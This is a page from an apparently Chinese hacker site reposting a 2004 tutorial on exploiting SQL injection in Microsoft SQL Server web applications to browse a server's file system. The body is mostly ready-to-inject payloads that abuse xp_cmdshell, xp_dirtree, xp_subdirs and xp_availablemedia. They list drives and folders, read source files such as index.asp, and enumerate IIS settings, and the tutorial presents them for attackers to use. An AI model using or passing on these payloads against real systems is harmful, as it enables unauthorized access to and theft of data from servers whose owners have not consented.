 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 如何利用Sql 注入遍历目录 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-11-7  |
|||||
|
by :sinka QQ:20355 Msn:roservior@vip.sina.com 如何利用Sql 注入遍历目录 关于如何取得注入入口不再说了,前面的帖子都说得很详细了,我们就如何浏览全部目录和文件进行研究当System_user为"sa"时,具有全部权限,包括执行master.dbo.xp_cmdshell,如果这个存储过程没有改名或删除,我们可以利用它来遍历全部目录,执行如下:先创建一个临时表:temp '5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 接下来:(1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中: 5';insert temp exec master.dbo.xp_availablemedia;-- 我们可以通过查询temp的内容来获得驱动器列表及相关信息(2)我们可以利用xp_subdirs获得子目录列表,并存入temp表中: 5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- (3)我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中: 5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 这样就可以成功的浏览到所有的目录(文件夹)列表:如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell: 5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 浏览temp就可以看到index.asp文件的内容了! 当然,如果xp_cmshell能够执行,我们可以用它来完成: 5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';-- 5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';-- 通过xp_cmdshell我们可以看到所有想看到的,包括W3svc 5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc' 但是,如果不是Admin的权限,我们还可以使用 5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 如果大家还有什么好的方法欢迎与我讨论研究 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 如何分级防御针对Linux服务器 网上交易失窃责任归属存争议 利用最近热门的Xss漏洞能做什 利用四种自制批处理文件防御 网络安全越来越重要 未来该如 利用xss漏洞能做什么? 国家计算机病毒中心发现利用 Google Gadget存漏洞 可被利 利用木马程序盗账号3天从银行 教您如何全面清除计算的机病 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
